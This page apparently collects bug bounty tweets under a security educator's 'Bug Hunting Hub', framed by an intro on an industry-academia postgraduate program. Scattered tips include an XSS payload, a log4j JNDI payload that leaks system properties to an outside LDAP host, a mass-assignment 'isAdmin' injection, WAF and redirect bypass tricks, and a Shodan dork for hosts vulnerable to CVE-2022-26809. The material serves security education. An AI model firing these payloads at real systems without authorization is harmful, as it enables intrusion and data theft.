Makrushin: Bug Hunting Hub

Add even more value to the information and cyber security education program. Integrate the hands-on experience required in production into the traditional training system. Address qualified staff shortages while maintaining the fundamental requirements of educational standards. In 2020, the three objectives were defined. In December 2022, with partner companies, we launched the postgraduate program at my alma mater - National Research Nuclear University MEPhI. In the Academic Director role, I'm proud to integrate the worlds of industry and academia. @makrushind

You discovered a critical vulnerability that will completely change the threat landscape. Disclosed to the vendor, but it declined to be fixed. “What's next?” - that’s the question.

In the days of major cybersecurity conferences, here's a small contribution. The rare vintage photo: two guys with jetlag discussing the threat landscape of Smart City systems, having discovered a vulnerability in Las Vegas mall navigation system 40 minutes before their talk.

#BugBountyTips of the Day SSRF 5k$ #BugBounty Join https://t.co/ChTRewW7BN https://t.co/66ZAqNnYBk --- Path Traversal $1,337$ Join https://t.co/ChTRewW7BN #BugBounty https://t.co/ev1W4IwfLN --- bug: PHP info page disclosure shodan: ssl:".target.com" "200" IP address 123.45.67.89 ffuf:~# ffuf -w ~/wordlists/common.txt -u http://123.45.67.89/FUZZ -mc 200,429 #bugbountytips https://t.co/Kv5s5m62MF --- After a lot of failures, too many duplicates on HackerOne, and a lot of demotivation... Today finally we did it Finally received mail from @GoogleVRP @Google Finally got GOOGLE HALL OF FAME and finally achieved my Dream #googlehof #BugBounty #bugbountytips #CyberSecurity https://t.co/3yRSeJLzoV --- How I Was Able To Send Emails On Behalf of Any Apple User Email, Yes Any!!! 😉 https://t.co/0xZBZzvaSx #bugbounty #apple #cybersecurity #informationsecurity #hacking https://t.co/2VnQ0va2Yt --- I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip https://t.co/iw76tPAQrB --- #bugbounty #bugbountytips I just published Critical Git Repository Leaked Internal Data #git #RCE #appsec More... https://t.co/4F80i8xwuS

#BugBountyTips of the Day Hacking Checklist ✅ - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj --- I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL --- I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL --- Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection --- #bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW --- This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr --- New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5 --- Mass assignment vulnerability in 1 step: ✅ ▶️ Intercept the request while login: { "name":"test”,”email":"[email protected]","password”:"testing” } ▶️Modify the request above request like: { “name”:"test”,"email”:"[email protected]”,"password”:"testing”,isAdmin”:true } #bugbounty #infosec --- [story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n --- (1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql

#BugBountyTips of the Day (Uncover -Quickly discover exposed hosts on the internet using multiple search engines.) - https://t.co/XtwiJFvb6i #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/F5y0xgD00X --- Recon Tools for Web Application Pentesting... :) Credits ~ Khalid Maina A Thread 🧵 ↓ #cybersecurity #infosec #pentesting #bugbounty --- Do you need to scan open ports passively? naabu, a fast #CLI #tool, searches the target on @shodanhq 's Internetdb in passive mode. https://t.co/xKk1Exk1aM @pdiscoveryio #OSINT #Shodan #bugbounty #passivescan #reconnaissance #infosec #cybersecurity https://t.co/J83dtNs81j --- Mass Account Takeovers using HTTP Request Smuggling 👻 #bugbountytips 🧵👇🏻 --- Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/kT5N7fSeXm

#BugBountyTips of the Day New Write-up on InfoSec Write-ups publication : "LDAP in Active Directory" #bugbounty #bugbountywriteup #bugbountytips https://t.co/Al8MbrognT --- Tips Rxss : --><svg onload=alert(document.domain)> #bugbountytips https://t.co/VxseOgZE3u --- If your repeater tab is not like this then you are doing something wrong x) #Burpsuite #Bugbounty https://t.co/kbQtmiRXlH

#BugBountyTips of the Day 🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji --- (WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf --- New RCE log4j with @GodfatherOrwa Paylaod : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty --- toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X --- 16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH --- Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0 --- Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah --- Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty --- Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty

#BugBountyTips of the Day Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope,text 2. You run your tools to find domains and save them to subs,text Everyday when you go to sleep run cat scope,txt | domain tools | anew subs,txt | tee -a newly-appear-doman,txt 1/2 --- Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY

#BugBountyTips of the Day Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR --- Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6 --- Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS --- Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice --- How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu --- API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30